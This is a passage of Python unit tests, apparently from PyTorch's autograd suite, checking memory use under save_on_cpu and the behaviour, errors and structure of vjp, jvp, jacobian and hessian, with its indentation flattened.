@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_graph_save_on_cpu_cuda(self):
def f(x):
a = x + 1
return a * a
# with grad
a = torch.ones(1, requires_grad=True, device="cuda")
y = f(a)
memory_with_grad = torch.cuda.memory_allocated()
del a
del y
# without grad
a = torch.ones(1, requires_grad=True, device="cuda")
with torch.no_grad():
y = f(a)
memory_without_grad = torch.cuda.memory_allocated()
self.assertGreater(memory_with_grad, memory_without_grad)
del a
del y
# with hooks
with torch.autograd.graph.save_on_cpu():
a = torch.ones(1, requires_grad=True, device="cuda")
y = f(a)
memory_with_hooks = torch.cuda.memory_allocated()
self.assertEqual(memory_with_hooks, memory_without_grad)
def index_perm_variable(shape, max_indices):
if not isinstance(shape, tuple):
shape = (shape,)
index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape)
return index
def bernoulli_scalar():
return torch.tensor(0, dtype=torch.uint8).bernoulli_()
def gradgradcheck_method_precision_override(test_name):
# these are just empirical observations, we should improve
gradgradcheck_precision_override = {
'test_norm': {'atol': 2e-2, 'rtol': 1e-2},
'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2},
'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2},
}
non_broadcasted_test_name = test_name.split("_broadcast")[0]
override = gradgradcheck_precision_override.get(non_broadcasted_test_name)
if override:
if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name:
# errors accumulated across 1 dimension
override = {'atol': override['atol'] * S, 'rtol': override['atol'] * S}
elif 'broadcast_all' in test_name:
# errors accumulated across multiple dimensions
override = {'atol': override['atol'] * S * S, 'rtol': override['atol'] * S * S}
return override
def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable,
input_variables, run_gradgradcheck=True, check_batched_grad=True,
check_forward_ad=False):
test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION,
check_batched_grad=check_batched_grad, check_forward_ad=check_forward_ad))
gradgradcheck_precision_override = gradgradcheck_method_precision_override(test_name)
if gradgradcheck_precision_override is not None:
atol = gradgradcheck_precision_override['atol']
rtol = gradgradcheck_precision_override['rtol']
test_case.assertTrue(gradgradcheck(apply_method, input_variables, None, atol=atol, rtol=rtol,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
else:
test_case.assertTrue(gradgradcheck(apply_method, input_variables,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks,
f_args_variable, f_args_tensor, *, check_forward_ad=False):
output_variable = apply_fn(*f_args_variable)
if run_grad_checks:
run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn,
output_variable, f_args_variable, check_forward_ad=check_forward_ad)
self_variable = f_args_variable[0]
if isinstance(output_variable, torch.Tensor) and output_variable.requires_grad and self_variable is not None:
output_variable.backward(torch.randn_like(output_variable))
test_case.assertEqualTypeString(self_variable, self_variable.grad)
test_case.assertEqual(self_variable.size(), self_variable.grad.size())
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors or tuple of Tensors with the same size
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
def test_vjp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.ones(3)
with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
res = autogradF.vjp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
res = autogradF.vjp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
res = autogradF.vjp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.vjp(foo, inp, v[:2])
res = autogradF.vjp(foo, inp, v)[1]
self._assert_same_struct(res, inp)
def test_vjp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vjp(foo, inp, v, strict=True)
res = autogradF.vjp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vjp(bar, inp, v, strict=True)
res = autogradF.vjp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = torch.ones(2)
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
res = autogradF.jvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
res = autogradF.jvp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
res = autogradF.jvp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.jvp(foo, inp, (v, v))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.jvp(foo, inp, v[:2])
res = autogradF.jvp(foo, inp, v)[1]
self._assert_same_struct(res, foo(inp))
def test_jvp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jvp(foo, inp, v, strict=True)
res = autogradF.jvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.jvp(bar, inp, v, strict=True)
res = autogradF.jvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[1], res[0])
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.ones(2), torch.ones(2))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out.grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, 2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], res[0])
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
test_cases = [
(torch.randn(2), torch.randn(3, device='cuda')),
(torch.randn(3, device='cuda'), torch.randn(2)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
# vmap is an experimental prototype. When someone calls torch.vmap,
# it raises a python warning. This test checks that
# autogradF.{jacobian, hessian} don't raise that experimental prototype
# warning; it is not nice for a public-facing API to raise a warning
# no matter how it is called.
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
res = autogradF.jacobian(bar, inp, vectorize=vectorize)
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(inp), inp)
def foo(a, b):
return b, 3 * a.narrow(0, 0, 3)
inp = (torch.rand(4), torch.rand(5))
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
return self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
def test_jacobian_no_grad(self):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs)
self.assertIsNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
self.assertIsNotNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNone(res.grad_fn)
def identity(x):
return x.clone()
inputs = torch.rand(4)
res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, identity(inputs), inputs)
self.assertIsNone(res.grad_fn)
self.assertEqual(res, torch.eye(4))
def add_exp_reducer(x, y):
return (x + y.exp()).sum(dim=1)
inputs = (torch.rand(4, 4), torch.rand(4, 4))
res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
def _test_jacobian_create_graph(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_exp_reducer(x, y):
return (x + y).exp().sum(dim=1)
inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
torch.rand(4, 4, dtype=torch.double, requires_grad=True))
res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def foo(x, y):
x = x.cos()
val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs):
expected = autogradF.jacobian(f, inputs, vectorize=False)
result = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_zero_dim(self):
# zero-dim output
def f(x, y):
return x.sum(), y.sum(), x * y
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
# zero-dim input
def g(x):
return torch.stack([x, x, x])
x = torch.randn([])
self._check_jacobian_vectorize_correctness(g, x)
# Mixed zero-dim input / zero-dim output
def h(x, y):
return y.sum(), x * y
x = torch.randn([])
y = torch.randn(1)
self._check_jacobian_vectorize_correctness(h, (x, y))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
def f(x, y):
return x * y, (x * y).cuda()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
# output unrelated to one input
def f(x, y):
return (x ** 2).sum()
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
# output unrelated to all inputs
def f(x, y):
return torch.randn([])
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
def _test_hessian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
def bar3(a):
return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
res = autogradF.hessian(bar, inp, vectorize=vectorize)
err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hessian(bar2, inp, vectorize=vectorize)
with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
res = autogradF.hessian(bar3, inp, vectorize=vectorize)
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hessian(foo, inp, strict=True)
res = autogradF.hessian(foo, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
res = autogradF.hessian(bar, inp, strict=True)
res = autogradF.hessian(bar, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hessian(bar2, inp, strict=True)
